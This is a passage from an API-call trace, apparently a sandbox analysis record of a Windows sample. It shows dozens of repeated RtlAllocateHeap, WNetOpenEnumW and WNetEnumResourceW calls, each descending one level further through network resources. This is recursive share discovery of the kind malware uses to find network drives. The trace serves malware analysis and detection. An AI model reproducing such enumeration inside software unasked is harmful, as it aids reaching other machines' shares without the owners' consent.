lpcCount=0x348e984, lpBuffer=0x371c248, lpBufferSize=0x348e974 | out: lpcCount=0x348e984, lpBuffer=0x371c248, lpBufferSize=0x348e974) returned 0x0 [0192.247] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x3730258 [0192.247] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x3734260 [0192.247] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x371c248, lphEnum=0x348e93c | out: lphEnum=0x348e93c*=0x28ea48) returned 0x0 [0192.249] WNetEnumResourceW (in: hEnum=0x28ea48, lpcCount=0x348e944, lpBuffer=0x3730258, lpBufferSize=0x348e934 | out: lpcCount=0x348e944, lpBuffer=0x3730258, lpBufferSize=0x348e934) returned 0x0 [0192.249] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x3744268 [0192.249] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x3748270 [0192.250] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x3730258, lphEnum=0x348e8fc | out: lphEnum=0x348e8fc*=0x28eaa0) returned 0x0 [0192.251] WNetEnumResourceW (in: hEnum=0x28eaa0, lpcCount=0x348e904, lpBuffer=0x3744268, lpBufferSize=0x348e8f4 | out: lpcCount=0x348e904, lpBuffer=0x3744268, lpBufferSize=0x348e8f4) returned 0x0 [0192.251] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x3758278 [0192.251] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x375c280 [0192.252] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x3744268, lphEnum=0x348e8bc | out: lphEnum=0x348e8bc*=0x28b800) returned 0x0 [0192.254] WNetEnumResourceW (in: hEnum=0x28b800, lpcCount=0x348e8c4, lpBuffer=0x3758278, lpBufferSize=0x348e8b4 | out: lpcCount=0x348e8c4, lpBuffer=0x3758278, lpBufferSize=0x348e8b4) returned 0x0 [0192.254] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x376c288 [0192.254] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x3770290 [0192.254] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x3758278, lphEnum=0x348e87c | out: lphEnum=0x348e87c*=0x28b858) returned 0x0 [0192.256] WNetEnumResourceW (in: hEnum=0x28b858, lpcCount=0x348e884, lpBuffer=0x376c288, lpBufferSize=0x348e874 | out: lpcCount=0x348e884, lpBuffer=0x376c288, lpBufferSize=0x348e874) returned 0x0 [0192.256] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x3780298 [0192.256] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x37842a0 [0192.257] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x376c288, lphEnum=0x348e83c | out: lphEnum=0x348e83c*=0x28b8b0) returned 0x0 [0192.259] WNetEnumResourceW (in: hEnum=0x28b8b0, lpcCount=0x348e844, lpBuffer=0x3780298, lpBufferSize=0x348e834 | out: lpcCount=0x348e844, lpBuffer=0x3780298, lpBufferSize=0x348e834) returned 0x0 [0192.259] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x37942a8 [0192.259] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x37982b0 [0192.260] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x3780298, lphEnum=0x348e7fc | out: lphEnum=0x348e7fc*=0x28b908) returned 0x0 [0192.262] WNetEnumResourceW (in: hEnum=0x28b908, lpcCount=0x348e804, lpBuffer=0x37942a8, lpBufferSize=0x348e7f4 | out: lpcCount=0x348e804, lpBuffer=0x37942a8, lpBufferSize=0x348e7f4) returned 0x0 [0192.262] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x37a82b8 [0192.262] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x37ac2c0 [0192.263] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x37942a8, lphEnum=0x348e7bc | out: lphEnum=0x348e7bc*=0x28b960) returned 0x0 [0192.264] WNetEnumResourceW (in: hEnum=0x28b960, lpcCount=0x348e7c4, lpBuffer=0x37a82b8, lpBufferSize=0x348e7b4 | out: lpcCount=0x348e7c4, lpBuffer=0x37a82b8, lpBufferSize=0x348e7b4) returned 0x0 [0192.264] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x37bc2c8 [0192.264] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x37c02d0 [0192.265] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x37a82b8, lphEnum=0x348e77c | out: lphEnum=0x348e77c*=0x28b9b8) returned 0x0 [0192.269] WNetEnumResourceW (in: hEnum=0x28b9b8, lpcCount=0x348e784, lpBuffer=0x37bc2c8, lpBufferSize=0x348e774 | out: lpcCount=0x348e784, lpBuffer=0x37bc2c8, lpBufferSize=0x348e774) returned 0x0 [0192.269] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x37d02d8 [0192.269] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x37d42e0 [0192.270] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x37bc2c8, lphEnum=0x348e73c | out: lphEnum=0x348e73c*=0x28ba10) returned 0x0 [0192.271] WNetEnumResourceW (in: hEnum=0x28ba10, lpcCount=0x348e744, lpBuffer=0x37d02d8, lpBufferSize=0x348e734 | out: lpcCount=0x348e744, lpBuffer=0x37d02d8, lpBufferSize=0x348e734) returned 0x0 [0192.271] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x37e42e8 [0192.271] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x37e82f0 [0192.272] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x37d02d8, lphEnum=0x348e6fc | out: lphEnum=0x348e6fc*=0x28ba68) returned 0x0 [0192.273] WNetEnumResourceW (in: hEnum=0x28ba68, lpcCount=0x348e704, lpBuffer=0x37e42e8, lpBufferSize=0x348e6f4 | out: lpcCount=0x348e704, lpBuffer=0x37e42e8, lpBufferSize=0x348e6f4) returned 0x0 [0192.273] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x37f82f8 [0192.274] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x37fc300 [0192.274] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x37e42e8, lphEnum=0x348e6bc | out: lphEnum=0x348e6bc*=0x28bac0) returned 0x0 [0192.280] WNetEnumResourceW (in: hEnum=0x28bac0, lpcCount=0x348e6c4, lpBuffer=0x37f82f8, lpBufferSize=0x348e6b4 | out: lpcCount=0x348e6c4, lpBuffer=0x37f82f8, lpBufferSize=0x348e6b4) returned 0x0 [0192.280] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x380c308 [0192.280] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x3810310 [0192.281] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x37f82f8, lphEnum=0x348e67c | out: lphEnum=0x348e67c*=0x28bb18) returned 0x0 [0192.283] WNetEnumResourceW (in: hEnum=0x28bb18, lpcCount=0x348e684, lpBuffer=0x380c308, lpBufferSize=0x348e674 | out: lpcCount=0x348e684, lpBuffer=0x380c308, lpBufferSize=0x348e674) returned 0x0 [0192.283] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x3820318 [0192.283] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x3824320 [0192.284] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x380c308, lphEnum=0x348e63c | out: lphEnum=0x348e63c*=0x28bb70) returned 0x0 [0192.286] WNetEnumResourceW (in: hEnum=0x28bb70, lpcCount=0x348e644, lpBuffer=0x3820318, lpBufferSize=0x348e634 | out: lpcCount=0x348e644, lpBuffer=0x3820318, lpBufferSize=0x348e634) returned 0x0 [0192.286] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x3834328 [0192.286] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x3838330 [0192.287] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x3820318, lphEnum=0x348e5fc | out: lphEnum=0x348e5fc*=0x28bbc8) returned 0x0 [0192.289] WNetEnumResourceW (in: hEnum=0x28bbc8, lpcCount=0x348e604, lpBuffer=0x3834328, lpBufferSize=0x348e5f4 | out: lpcCount=0x348e604, lpBuffer=0x3834328, lpBufferSize=0x348e5f4) returned 0x0 [0192.289] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x3848338 [0192.289] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x384c340 [0192.289] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x3834328, lphEnum=0x348e5bc | out: lphEnum=0x348e5bc*=0x28bc20) returned 0x0 [0192.291] WNetEnumResourceW (in: hEnum=0x28bc20, lpcCount=0x348e5c4, lpBuffer=0x3848338, lpBufferSize=0x348e5b4 | out: lpcCount=0x348e5c4, lpBuffer=0x3848338, lpBufferSize=0x348e5b4) returned 0x0 [0192.291] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x385c348 [0192.291] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x3860350 [0192.292] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x3848338, lphEnum=0x348e57c | out: lphEnum=0x348e57c*=0x28bc78) returned 0x0 [0192.294] WNetEnumResourceW (in: hEnum=0x28bc78, lpcCount=0x348e584, lpBuffer=0x385c348, lpBufferSize=0x348e574 | out: lpcCount=0x348e584, lpBuffer=0x385c348, lpBufferSize=0x348e574) returned 0x0 [0192.294] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x3870358 [0192.294] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x3874360 [0192.295] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x385c348, lphEnum=0x348e53c | out: lphEnum=0x348e53c*=0x28bcd0) returned 0x0 [0192.297] WNetEnumResourceW (in: hEnum=0x28bcd0, lpcCount=0x348e544, lpBuffer=0x3870358, lpBufferSize=0x348e534 | out: lpcCount=0x348e544, lpBuffer=0x3870358, lpBufferSize=0x348e534) returned 0x0 [0192.297] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x3884368 [0192.297] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x4190048 [0192.298] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x3870358, lphEnum=0x348e4fc | out: lphEnum=0x348e4fc*=0x28bd28) returned 0x0 [0192.300] WNetEnumResourceW (in: hEnum=0x28bd28, lpcCount=0x348e504, lpBuffer=0x3884368, lpBufferSize=0x348e4f4 | out: lpcCount=0x348e504, lpBuffer=0x3884368, lpBufferSize=0x348e4f4) returned 0x0 [0192.300] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x3888370 [0192.300] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x41a0050 [0192.300] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x3884368, lphEnum=0x348e4bc | out: lphEnum=0x348e4bc*=0x28bd80) returned 0x0 [0192.303] WNetEnumResourceW (in: hEnum=0x28bd80, lpcCount=0x348e4c4, lpBuffer=0x3888370, lpBufferSize=0x348e4b4 | out: lpcCount=0x348e4c4, lpBuffer=0x3888370, lpBufferSize=0x348e4b4) returned 0x0 [0192.303] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x41b0058 [0192.303] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x41b4060 [0192.303] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x3888370, lphEnum=0x348e47c | out: lphEnum=0x348e47c*=0x28bdd8) returned 0x0 [0192.305] WNetEnumResourceW (in: hEnum=0x28bdd8, lpcCount=0x348e484, lpBuffer=0x41b0058, lpBufferSize=0x348e474 | out: lpcCount=0x348e484, lpBuffer=0x41b0058, lpBufferSize=0x348e474) returned 0x0 [0192.305] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x41c4068 [0192.305] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x41c8070 [0192.305] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x41b0058, lphEnum=0x348e43c | out: lphEnum=0x348e43c*=0x28be30) returned 0x0 [0192.307] WNetEnumResourceW (in: hEnum=0x28be30, lpcCount=0x348e444, lpBuffer=0x41c4068, lpBufferSize=0x348e434 | out: lpcCount=0x348e444, lpBuffer=0x41c4068, lpBufferSize=0x348e434) returned 0x0 [0192.307] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x41d8078 [0192.307] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x41dc080 [0192.308] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x41c4068, lphEnum=0x348e3fc | out: lphEnum=0x348e3fc*=0x28be88) returned 0x0 [0192.310] WNetEnumResourceW (in: hEnum=0x28be88, lpcCount=0x348e404, lpBuffer=0x41d8078, lpBufferSize=0x348e3f4 | out: lpcCount=0x348e404, lpBuffer=0x41d8078, lpBufferSize=0x348e3f4) returned 0x0 [0192.310] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x41ec088 [0192.310] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x41f0090 [0192.311] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x41d8078, lphEnum=0x348e3bc | out: lphEnum=0x348e3bc*=0x28bee0) returned 0x0 [0192.313] WNetEnumResourceW (in: hEnum=0x28bee0, lpcCount=0x348e3c4, lpBuffer=0x41ec088, lpBufferSize=0x348e3b4 | out: lpcCount=0x348e3c4, lpBuffer=0x41ec088, lpBufferSize=0x348e3b4) returned 0x0 [0192.313] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x4200098 [0192.313] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x42040a0 [0192.313] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x41ec088, lphEnum=0x348e37c | out: lphEnum=0x348e37c*=0x28bf38) returned 0x0 [0192.315] WNetEnumResourceW (in: hEnum=0x28bf38, lpcCount=0x348e384, lpBuffer=0x4200098, lpBufferSize=0x348e374 | out: lpcCount=0x348e384, lpBuffer=0x4200098, lpBufferSize=0x348e374) returned 0x0 [0192.315] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x42140a8 [0192.315] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x42180b0 [0192.316] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x4200098, lphEnum=0x348e33c | out: lphEnum=0x348e33c*=0x28bf90) returned 0x0 [0192.318] WNetEnumResourceW (in: hEnum=0x28bf90, lpcCount=0x348e344, lpBuffer=0x42140a8, lpBufferSize=0x348e334 | out: lpcCount=0x348e344, lpBuffer=0x42140a8, lpBufferSize=0x348e334) returned 0x0 [0192.318] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x42280b8 [0192.318] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x422c0c0 [0192.318] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x42140a8, lphEnum=0x348e2fc | out: lphEnum=0x348e2fc*=0x28f370) returned 0x0 [0192.320] WNetEnumResourceW (in: hEnum=0x28f370, lpcCount=0x348e304, lpBuffer=0x42280b8, lpBufferSize=0x348e2f4 | out: lpcCount=0x348e304, lpBuffer=0x42280b8, lpBufferSize=0x348e2f4) returned 0x0 [0192.320] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x423c0c8 [0192.321] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x42400d0 [0192.321] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x42280b8, lphEnum=0x348e2bc | out: lphEnum=0x348e2bc*=0x28f3c8) returned 0x0 [0192.323] WNetEnumResourceW (in: hEnum=0x28f3c8, lpcCount=0x348e2c4, lpBuffer=0x423c0c8, lpBufferSize=0x348e2b4 | out: lpcCount=0x348e2c4, lpBuffer=0x423c0c8, lpBufferSize=0x348e2b4) returned 0x0 [0192.323] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x42500d8 [0192.323] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x42540e0 [0192.324] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x423c0c8, lphEnum=0x348e27c | out: lphEnum=0x348e27c*=0x28f420) returned 0x0 [0192.326] WNetEnumResourceW (in: hEnum=0x28f420, lpcCount=0x348e284, lpBuffer=0x42500d8, lpBufferSize=0x348e274 | out: lpcCount=0x348e284, lpBuffer=0x42500d8, lpBufferSize=0x348e274) returned 0x0 [0192.326] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x42640e8 [0192.326] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x42680f0 [0192.326] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x42500d8, lphEnum=0x348e23c | out: lphEnum=0x348e23c*=0x28f478) returned 0x0 [0192.328] WNetEnumResourceW (in: hEnum=0x28f478, lpcCount=0x348e244, lpBuffer=0x42640e8, lpBufferSize=0x348e234 | out: lpcCount=0x348e244, lpBuffer=0x42640e8, lpBufferSize=0x348e234) returned 0x0 [0192.328] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x42780f8 [0192.328] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x427c100 [0192.329] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x42640e8, lphEnum=0x348e1fc | out: lphEnum=0x348e1fc*=0x28f4d0) returned 0x0 [0192.333] WNetEnumResourceW (in: hEnum=0x28f4d0, lpcCount=0x348e204, lpBuffer=0x42780f8, lpBufferSize=0x348e1f4 | out: lpcCount=0x348e204, lpBuffer=0x42780f8, lpBufferSize=0x348e1f4) returned 0x0 [0192.333] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x428c108 [0192.333] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x4290110 [0192.333] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x42780f8, lphEnum=0x348e1bc | out: lphEnum=0x348e1bc*=0x28f528) returned 0x0 [0192.335] WNetEnumResourceW (in: hEnum=0x28f528, lpcCount=0x348e1c4, lpBuffer=0x428c108, lpBufferSize=0x348e1b4 | out: lpcCount=0x348e1c4, lpBuffer=0x428c108, lpBufferSize=0x348e1b4) returned 0x0 [0192.335] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x42a0118 [0192.335] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x42a4120 [0192.335] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x428c108, lphEnum=0x348e17c | out: lphEnum=0x348e17c*=0x28f580) returned 0x0 [0192.337] WNetEnumResourceW (in: hEnum=0x28f580, lpcCount=0x348e184, lpBuffer=0x42a0118, lpBufferSize=0x348e174 | out: lpcCount=0x348e184, lpBuffer=0x42a0118, lpBufferSize=0x348e174) returned 0x0 [0192.337] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x42b4128 [0192.337] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x42b8130 [0192.338] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x42a0118, lphEnum=0x348e13c | out: lphEnum=0x348e13c*=0x28f5d8) returned 0x0 [0192.340] WNetEnumResourceW (in: hEnum=0x28f5d8, lpcCount=0x348e144, lpBuffer=0x42b4128, lpBufferSize=0x348e134 | out: lpcCount=0x348e144, lpBuffer=0x42b4128, lpBufferSize=0x348e134) returned 0x0 [0192.340] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x42c8138 [0192.340] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x42cc140 [0192.340] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x42b4128, lphEnum=0x348e0fc | out: lphEnum=0x348e0fc*=0x28f630) returned 0x0 [0192.342] WNetEnumResourceW (in: hEnum=0x28f630, lpcCount=0x348e104, lpBuffer=0x42c8138, lpBufferSize=0x348e0f4 | out: lpcCount=0x348e104, lpBuffer=0x42c8138, lpBufferSize=0x348e0f4) returned 0x0 [0192.342] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x42dc148 [0192.342] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x42e0150 [0192.342] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x42c8138, lphEnum=0x348e0bc | out: lphEnum=0x348e0bc*=0x28f688) returned 0x0 [0192.344] WNetEnumResourceW (in: hEnum=0x28f688, lpcCount=0x348e0c4, lpBuffer=0x42dc148, lpBufferSize=0x348e0b4 | out: lpcCount=0x348e0c4, lpBuffer=0x42dc148, lpBufferSize=0x348e0b4) returned 0x0 [0192.344] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x42f0158 [0192.344] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x42f4160 [0192.345] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x42dc148, lphEnum=0x348e07c | out: lphEnum=0x348e07c*=0x28f6e0) returned 0x0 [0192.346] WNetEnumResourceW (in: hEnum=0x28f6e0, lpcCount=0x348e084, lpBuffer=0x42f0158, lpBufferSize=0x348e074 | out: lpcCount=0x348e084, lpBuffer=0x42f0158, lpBufferSize=0x348e074) returned 0x0 [0192.346] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x4304168 [0192.347] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x4308170 [0192.347] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x42f0158, lphEnum=0x348e03c | out: lphEnum=0x348e03c*=0x28f738) returned 0x0 [0192.349] WNetEnumResourceW (in: hEnum=0x28f738, lpcCount=0x348e044, lpBuffer=0x4304168, lpBufferSize=0x348e034 | out: lpcCount=0x348e044, lpBuffer=0x4304168, lpBufferSize=0x348e034) returned 0x0 [0192.349] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x4318178 [0192.349] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x431c180 [0192.349] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x4304168, lphEnum=0x348dffc | out: lphEnum=0x348dffc*=0x28f790) returned 0x0 [0192.351] WNetEnumResourceW (in: hEnum=0x28f790, lpcCount=0x348e004, lpBuffer=0x4318178, lpBufferSize=0x348dff4 | out: lpcCount=0x348e004, lpBuffer=0x4318178, lpBufferSize=0x348dff4) returned 0x0 [0192.351] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x432c188 [0192.351] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x4330190 [0192.351] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x4318178, lphEnum=0x348dfbc | out: lphEnum=0x348dfbc*=0x28f7e8) returned 0x0 [0192.353] WNetEnumResourceW (in: hEnum=0x28f7e8, lpcCount=0x348dfc4, lpBuffer=0x432c188, lpBufferSize=0x348dfb4 | out: lpcCount=0x348dfc4, lpBuffer=0x432c188, lpBufferSize=0x348dfb4) returned 0x0 [0192.353] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x4340198 [0192.353] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x43441a0 [0192.354] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x432c188, lphEnum=0x348df7c | out: lphEnum=0x348df7c*=0x28f840) returned 0x0 [0192.355] WNetEnumResourceW (in: hEnum=0x28f840, lpcCount=0x348df84, lpBuffer=0x4340198, lpBufferSize=0x348df74 | out: lpcCount=0x348df84, lpBuffer=0x4340198, lpBufferSize=0x348df74) returned 0x0 [0192.355] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x43541a8 [0192.356] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x43581b0 [0192.356] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x4340198, lphEnum=0x348df3c | out: lphEnum=0x348df3c*=0x28f898) returned 0x0 [0192.358] WNetEnumResourceW (in: hEnum=0x28f898, lpcCount=0x348df44, lpBuffer=0x43541a8, lpBufferSize=0x348df34 | out: lpcCount=0x348df44, lpBuffer=0x43541a8, lpBufferSize=0x348df34) returned 0x0 [0192.358] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x43681b8 [0192.358] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x436c1c0 [0192.359] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x43541a8, lphEnum=0x348defc | out: lphEnum=0x348defc*=0x28f8f0) returned 0x0 [0192.361] WNetEnumResourceW (in: hEnum=0x28f8f0, lpcCount=0x348df04, lpBuffer=0x43681b8, lpBufferSize=0x348def4 | out: lpcCount=0x348df04, lpBuffer=0x43681b8, lpBufferSize=0x348def4) returned 0x0 [0192.361] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x437c1c8 [0192.361] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x43801d0 [0192.361] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x43681b8, lphEnum=0x348debc | out: lphEnum=0x348debc*=0x28f948) returned 0x0 [0192.363] WNetEnumResourceW (in: hEnum=0x28f948, lpcCount=0x348dec4, lpBuffer=0x437c1c8, lpBufferSize=0x348deb4 | out: lpcCount=0x348dec4, lpBuffer=0x437c1c8, lpBufferSize=0x348deb4) returned 0x0 [0192.363] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x43901d8 [0192.363] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x43941e0 [0192.363] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x437c1c8, lphEnum=0x348de7c | out: lphEnum=0x348de7c*=0x28f9a0) returned 0x0 [0192.365] WNetEnumResourceW (in: hEnum=0x28f9a0, lpcCount=0x348de84, lpBuffer=0x43901d8, 